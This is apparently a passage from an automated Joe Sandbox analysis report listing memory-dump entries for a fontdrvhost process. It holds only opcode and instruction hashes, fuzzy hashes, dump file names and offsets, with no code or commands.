                                                                                                                                                                                              • Opcode ID: af015cc2917bdb36b41e167f43515fa24ed2c2491ea8d093252050e0c63a0290
                                                                                                                                                                                              • Instruction ID: afa1b2f6a9b4df203de67376cd94152e1823a3a6ec95e187f6ff21fb896aadfa
                                                                                                                                                                                              • Opcode Fuzzy Hash: af015cc2917bdb36b41e167f43515fa24ed2c2491ea8d093252050e0c63a0290
                                                                                                                                                                                              • Instruction Fuzzy Hash: 78C14231718D094FDB8CFA389469EB573D2EFA970071545A9E11AC72E6DE24EC42C781
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001A.00000002.2937301340.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_7ffd9bc90000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: ebb395aaacfe57c9ceb47faf084787742ecb707b3bb00c6db52b3347ee9b88a8
                                                                                                                                                                                              • Instruction ID: 1e941edfc2c7b8dc374795c5940f8ea590d9ef28be3726aaa4ef67e41c530607
                                                                                                                                                                                              • Opcode Fuzzy Hash: ebb395aaacfe57c9ceb47faf084787742ecb707b3bb00c6db52b3347ee9b88a8
                                                                                                                                                                                              • Instruction Fuzzy Hash: 15C1CE3061A54A9BFB2DCF64C0A05B937A1FF45300B5546BDC88B8B69FCA38E582CB41
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001A.00000002.2937301340.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_7ffd9bc90000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: d597de22f0714df5a8c346523e733ed2a8cd9e578228ff0edb82d54a691947c0
                                                                                                                                                                                              • Instruction ID: d8f598c38ad001e85a30f24cdfb8815fce137907fb6e7eabe247cc3011e6641b
                                                                                                                                                                                              • Opcode Fuzzy Hash: d597de22f0714df5a8c346523e733ed2a8cd9e578228ff0edb82d54a691947c0
                                                                                                                                                                                              • Instruction Fuzzy Hash: 41C1DE3061A54A8BEB2DCF64C0E85B937A1FF45300B5545BDC88BCB69FCA78E981CB41
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001A.00000002.2937301340.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_7ffd9bc90000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 69fa0b91442e8f78066f076fad40dc345d70b12fc63e794754003807f36ee0c1
                                                                                                                                                                                              • Instruction ID: 418829450df977460fa8344091ff262d03e7433e5adc403e558e4c9f4d583365
                                                                                                                                                                                              • Opcode Fuzzy Hash: 69fa0b91442e8f78066f076fad40dc345d70b12fc63e794754003807f36ee0c1
                                                                                                                                                                                              • Instruction Fuzzy Hash: 96C1F430719A4A8FE759DB68C4A16A8B7A1FF85300F4541BED04EC7ADBCB28F951C780
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001A.00000002.2937301340.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_7ffd9bc90000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 540b5ea2912a11acb3780b4061777f18ae311d991e023bdf36affaa5c367d39a
                                                                                                                                                                                              • Instruction ID: 91f6492b1acf4d0e7c53a28877c3fd0659182938219d2885a0f9f57c7a26e94d
                                                                                                                                                                                              • Opcode Fuzzy Hash: 540b5ea2912a11acb3780b4061777f18ae311d991e023bdf36affaa5c367d39a
                                                                                                                                                                                              • Instruction Fuzzy Hash: C2C10730B0E94A8FF759DB64C4A16A8B7A1FF59340F554179C04EC7AAACB28F951C780
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001A.00000002.2937301340.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_7ffd9bc90000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 2a1a4c6ff0a4fe26eaa4863907cc7f50a88d18a32e82a116a283bc05d2b9dddc
                                                                                                                                                                                              • Instruction ID: b0e5d21fb1c0df2d45a88d98846139efc9af4a04fc141852e87c67404fbd7e61
                                                                                                                                                                                              • Opcode Fuzzy Hash: 2a1a4c6ff0a4fe26eaa4863907cc7f50a88d18a32e82a116a283bc05d2b9dddc
                                                                                                                                                                                              • Instruction Fuzzy Hash: D921D351F0E16A86F73926B928351BC26408F503A5F1701B7F46E860EBDC4C2A452382
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001A.00000002.2937301340.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_7ffd9bc90000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: a089290813c3423da655ae17c4ba542f2defa67459bfd7a2fcbecde14b532eb0
                                                                                                                                                                                              • Instruction ID: ebef9646f7cd2893795f1482d57507a205123ac06aaf6613e250f7d42dfa6477
                                                                                                                                                                                              • Opcode Fuzzy Hash: a089290813c3423da655ae17c4ba542f2defa67459bfd7a2fcbecde14b532eb0
                                                                                                                                                                                              • Instruction Fuzzy Hash: F621F252F0E19BA6F73D56B568355BC37409F41220F1A05BAD44E460EFEC4C3A819292
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001A.00000002.2937301340.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_7ffd9bc90000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: cc2b30705d050e8037fc89ded79116f6c2199ab78b92c4575a548ed670339911
                                                                                                                                                                                              • Instruction ID: d143599c6d929406d1f49d778b35f19c7ef4f60b48c931b3352c33e6b8250ff2
                                                                                                                                                                                              • Opcode Fuzzy Hash: cc2b30705d050e8037fc89ded79116f6c2199ab78b92c4575a548ed670339911
                                                                                                                                                                                              • Instruction Fuzzy Hash: C2816731B1EA4A4FF3389A7894254BD77E0FF45391B16057ED08ED31ABDE28B9028751
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001A.00000002.2937301340.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_7ffd9bc90000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 7c5edfed9ce48a4d40060a756de4a27b855cf2c22302f1ebe52ea0f77a6bb681
                                                                                                                                                                                              • Instruction ID: 94465536670f8d9515dd4be6a9c8464a5f3de1574305ed3ca7e376aa69f811c5
                                                                                                                                                                                              • Opcode Fuzzy Hash: 7c5edfed9ce48a4d40060a756de4a27b855cf2c22302f1ebe52ea0f77a6bb681
                                                                                                                                                                                              • Instruction Fuzzy Hash: DF815731B0E64A4FF33D9AA8946547D77E0EF95350B16047EE48FC72ABDE28B9028741
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001A.00000002.2937301340.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_7ffd9bc90000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 2b2e3cf7eee0e95a34746d60041a375d7b69e24fa8cfc04bc8f9175e2b3de6f6
                                                                                                                                                                                              • Instruction ID: 84d6f42be8ddcabacf9913bdf818518cfb9037d9368cc5b090301e549f5aeeb8
                                                                                                                                                                                              • Opcode Fuzzy Hash: 2b2e3cf7eee0e95a34746d60041a375d7b69e24fa8cfc04bc8f9175e2b3de6f6
                                                                                                                                                                                              • Instruction Fuzzy Hash: AE719030E1A54E8FFB69DBB48865ABCBBB1FF45340F5105BAD00ED71E9DB2869418701
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001A.00000002.2937301340.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_7ffd9bc90000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: ceb0431f7660410840969ae9c48a950bcc996975a9d66315bb92e6b68bae6642
                                                                                                                                                                                              • Instruction ID: ce4d0d61347c6ad575a6c617c3e69511fccbec8415e224eda500b380ed0e774c
                                                                                                                                                                                              • Opcode Fuzzy Hash: ceb0431f7660410840969ae9c48a950bcc996975a9d66315bb92e6b68bae6642
                                                                                                                                                                                              • Instruction Fuzzy Hash: AA71A431E1D94E8EF765DBB888656BDBBB1FF45301F5100BAD00ED71EADA286A41C701
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001A.00000002.2939565054.00007FFD9BDC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BDC0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_7ffd9bdc0000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 6f624ab06d2bf7faee869abe82c192578addc3e000da410c3942d87959bd31a9
                                                                                                                                                                                              • Instruction ID: 777b7d1c4b140ef9f59472ac5b8ed87e78849853e80e1daac3802c858cb3b42d
                                                                                                                                                                                              • Opcode Fuzzy Hash: 6f624ab06d2bf7faee869abe82c192578addc3e000da410c3942d87959bd31a9
                                                                                                                                                                                              • Instruction Fuzzy Hash: 6D61A330B19E094FE799FB3C8869A7533D2EB993057154979D01DC32EADE39EC828741
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001A.00000002.2937301340.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_7ffd9bc90000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 9ab32285e4414046a90b946a458667e5012b56e0848a11feca7a32bb252cfce0
                                                                                                                                                                                              • Instruction ID: 0128413454fccbc5095b71b3ec85a5e6b1e0d1fe2a2c1986074d6689a6f5370b
                                                                                                                                                                                              • Opcode Fuzzy Hash: 9ab32285e4414046a90b946a458667e5012b56e0848a11feca7a32bb252cfce0
                                                                                                                                                                                              • Instruction Fuzzy Hash: 32510535B0E48D6FF778DA6888675BC77D0FF44310B0602B9D09EC75BADE18AA068741
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001A.00000002.2937301340.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_7ffd9bc90000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: d0e47da4ad3a36c3c23faa3ebb399631b9b94106ffcc4e54c3c1b246e1f83826
                                                                                                                                                                                              • Instruction ID: 8fddcbaffd95dcf9d4f6c438204fb659b7be3c87f61ec12c670237c2eb9aef47
                                                                                                                                                                                              • Opcode Fuzzy Hash: d0e47da4ad3a36c3c23faa3ebb399631b9b94106ffcc4e54c3c1b246e1f83826
                                                                                                                                                                                              • Instruction Fuzzy Hash: C6510471A0E44D4FF778DA6888669BC77D0EF54350B0602B9F09EC75FEDD18AA068781
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001A.00000002.2937301340.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_7ffd9bc90000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 8223fdab6afc3d2360a6f1e388286d20b5f248e39385bdbcb8aa5e45842fa8cb
                                                                                                                                                                                              • Instruction ID: 2dc451b8e9425687f4dd258f2670d5f7d4cfc57017c5b63ea306ca4b8b48405b
                                                                                                                                                                                              • Opcode Fuzzy Hash: 8223fdab6afc3d2360a6f1e388286d20b5f248e39385bdbcb8aa5e45842fa8cb
                                                                                                                                                                                              • Instruction Fuzzy Hash: E2511230E1D95E4BFBA89B6884796BCB7A1FF51300F4541BEC09EC729ADD386A818741
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001A.00000002.2937301340.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_7ffd9bc90000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 79105e3ba1c1d032d608e9486d0cf947fad29d95c4119fbdd5f6ab0a855615d3
                                                                                                                                                                                              • Instruction ID: 05fe1a604160fc08c308287b77f9763dd15b7107a266cabff7da084defa01acc
                                                                                                                                                                                              • Opcode Fuzzy Hash: 79105e3ba1c1d032d608e9486d0cf947fad29d95c4119fbdd5f6ab0a855615d3
                                                                                                                                                                                              • Instruction Fuzzy Hash: C751A030E1964EAFEB65DBB488665FCBBB1FF19300F5104B9D05ED71A9DA286A42C700
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001A.00000002.2931707446.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_7ffd9b8a0000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 0c542246fee0866028fd52a33a3dde153e23cc3bc29b7681b0b57ea0834a60f4
                                                                                                                                                                                              • Instruction ID: 17e720db762cbbbdb0da8460848f40ad9e61f2270843c64bad51d4bb9a9da091
                                                                                                                                                                                              • Opcode Fuzzy Hash: 0c542246fee0866028fd52a33a3dde153e23cc3bc29b7681b0b57ea0834a60f4
                                                                                                                                                                                              • Instruction Fuzzy Hash: C0412722B1D96D4EE71DB7AC74A96F977C1DF49324F0404BBD00EC71E7ED28A8428284
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001A.00000002.2937301340.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_7ffd9bc90000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: fc2c36d61d1023e5e7eca40ed69357c31c618882ccea4ad7491fd56affb204c1
                                                                                                                                                                                              • Instruction ID: c989dbb01fce2e89e764fc3576573fdaceb2db48e1ab1dbbe119752f208e1180
                                                                                                                                                                                              • Opcode Fuzzy Hash: fc2c36d61d1023e5e7eca40ed69357c31c618882ccea4ad7491fd56affb204c1
                                                                                                                                                                                              • Instruction Fuzzy Hash: B741623160CA488FDF9CEF28D4A5AA477E1FB6831070545AAD04EC7296DE21F985CB81
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001A.00000002.2937301340.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_7ffd9bc90000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 441d1f3fe28419aa17d2b71d405b8d2d8ce358418993b58929097b08394e02a1
                                                                                                                                                                                              • Instruction ID: e353309f0e325ba93f78919b006d11b83e29d8cb02ddb35e0baad6094c29179d
                                                                                                                                                                                              • Opcode Fuzzy Hash: 441d1f3fe28419aa17d2b71d405b8d2d8ce358418993b58929097b08394e02a1
                                                                                                                                                                                              • Instruction Fuzzy Hash: 6541643260C9488FDF9CEF68C4A5DA873E1FBA831071511AAD04FC71A6DE25F945CB81
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001A.00000002.2937301340.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_7ffd9bc90000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 22ed55b3e83332494d791185ddf0947d7c89d4a01831f75b0bbe9834fa6d8171
                                                                                                                                                                                              • Instruction ID: 60e16419dcc42a9d79b98c1fbf35fad41eee999b01850ba54e357eac2a1557e5
                                                                                                                                                                                              • Opcode Fuzzy Hash: 22ed55b3e83332494d791185ddf0947d7c89d4a01831f75b0bbe9834fa6d8171
                                                                                                                                                                                              • Instruction Fuzzy Hash: B331823160CA488FDB9CEF28C4A5E6477E1FB6831070546AED45EC72A6DE25FC85CB81
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001A.00000002.2937301340.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_7ffd9bc90000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: cde2be25ad948d4d6b1b7432e5947c427186ff4674b7fa33e60bc594c4b96e84
                                                                                                                                                                                              • Instruction ID: 18286913393ec76f3835a813d4d05b3e0b0781006ed0ca8504c208843be9f276
                                                                                                                                                                                              • Opcode Fuzzy Hash: cde2be25ad948d4d6b1b7432e5947c427186ff4674b7fa33e60bc594c4b96e84
                                                                                                                                                                                              • Instruction Fuzzy Hash: 7A31813160C9488FDB9DEF28C4A5E6473E1FBA831071505AED05BC71A6DE25F845CB81
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001A.00000002.2931707446.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_7ffd9b8a0000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: c3d7e5f302a88f8ec2398e6a7592314a031dcba88df827417dd45c6b7d3b22c7
                                                                                                                                                                                              • Instruction ID: 8f0ad7c45b02b83b038004b2c57ba88b8e14885f4337ba5d9f3c74c307c3e55b
                                                                                                                                                                                              • Opcode Fuzzy Hash: c3d7e5f302a88f8ec2398e6a7592314a031dcba88df827417dd45c6b7d3b22c7
                                                                                                                                                                                              • Instruction Fuzzy Hash: FE21F83130DC194FE768EB4CE899DB973D1EB5932131105BAE58AC7136D911EC9287C1
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001A.00000002.2937301340.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_7ffd9bc90000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 0c3863233176a05b2a7d99ba23e932e3bd70fd3bd9e9f5568783cd7a4e16b784
                                                                                                                                                                                              • Instruction ID: 95a1c07d5a519b8052f4ba72c60df95f31183b467c722a746e87e53c214e0713
                                                                                                                                                                                              • Opcode Fuzzy Hash: 0c3863233176a05b2a7d99ba23e932e3bd70fd3bd9e9f5568783cd7a4e16b784
                                                                                                                                                                                              • Instruction Fuzzy Hash: 10318F3160CA49CFDB9CEF28C4A5EA477E1FB6831070545AAD04EC72A6DE25F885CB81
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001A.00000002.2937301340.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_7ffd9bc90000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: c90285d54177c256fc3bd96b4ea4421f3cebf09bfa8b180beef71e575475b235
                                                                                                                                                                                              • Instruction ID: ba1c1cad6a541d8fab28ef4f8f08396142bc6f5f166129faa29b7d81ad0b1883
                                                                                                                                                                                              • Opcode Fuzzy Hash: c90285d54177c256fc3bd96b4ea4421f3cebf09bfa8b180beef71e575475b235
                                                                                                                                                                                              • Instruction Fuzzy Hash: 5F31803160C9488FDF9CEF28C4A5EA4B3E2FBA831071505ADD04BC72A6DE25F845CB81
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001A.00000002.2939565054.00007FFD9BDC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BDC0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_7ffd9bdc0000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: a5124217a8fe5e8b44774738cb7b6fdd378b44c6a47f3b7277b9a54b37704a40
                                                                                                                                                                                              • Instruction ID: ef714fb37bf3e2cb0acfa6e7d461e4dfaaf063d9a58850976ffde2bc18c91309
                                                                                                                                                                                              • Opcode Fuzzy Hash: a5124217a8fe5e8b44774738cb7b6fdd378b44c6a47f3b7277b9a54b37704a40
                                                                                                                                                                                              • Instruction Fuzzy Hash: 2421E512B2E98E4FE77DA6A818601746B91FF5934476510F7D04FC71D6EE186E068350
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001A.00000002.2937301340.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_7ffd9bc90000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: d11c8e87062927649e8091a754b840c43a1ca9bd1e2ee420bff30e8efc5c4997
                                                                                                                                                                                              • Instruction ID: 022ae68512b7e277c0fe7eca1df6d0ead3f831083f032a2c20fdd99f154bd284
                                                                                                                                                                                              • Opcode Fuzzy Hash: d11c8e87062927649e8091a754b840c43a1ca9bd1e2ee420bff30e8efc5c4997
                                                                                                                                                                                              • Instruction Fuzzy Hash: C9314571B1990E9FEB68DB98C4A19BCB3A1FF55710B124139D05DD7296CF24BD12C780
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001A.00000002.2937301340.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_7ffd9bc90000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 4c4425e42c0f5d613edf54fb8754de9b7885e1c5ecd2d9d84d3af0a4b3fae594
                                                                                                                                                                                              • Instruction ID: b7d838544fc956263e20e6da8353e93131f3b2dd97d8fb7675d7939b1e958004
                                                                                                                                                                                              • Opcode Fuzzy Hash: 4c4425e42c0f5d613edf54fb8754de9b7885e1c5ecd2d9d84d3af0a4b3fae594
                                                                                                                                                                                              • Instruction Fuzzy Hash: DD311C70E1E64ECFFBA8DBA484655BD77B2FF54300F52017AD40ED61A6DA38BA408B41
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001A.00000002.2937301340.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_7ffd9bc90000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: fd5a4aebcc4636892df4b34d6dfb0565eaa800c3f6dab3931040aeaa13db67d1
                                                                                                                                                                                              • Instruction ID: c55ab73e8169b2049f83e0f56920caf4b400c74d6dd3f7634adce3bdde44c3ba
                                                                                                                                                                                              • Opcode Fuzzy Hash: fd5a4aebcc4636892df4b34d6dfb0565eaa800c3f6dab3931040aeaa13db67d1
                                                                                                                                                                                              • Instruction Fuzzy Hash: 34317271B1A90E9FEB68EE68C4A19BCB3A1FF54710B15413AD05EC7296CF24BD11C784
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001A.00000002.2931707446.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_7ffd9b8a0000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
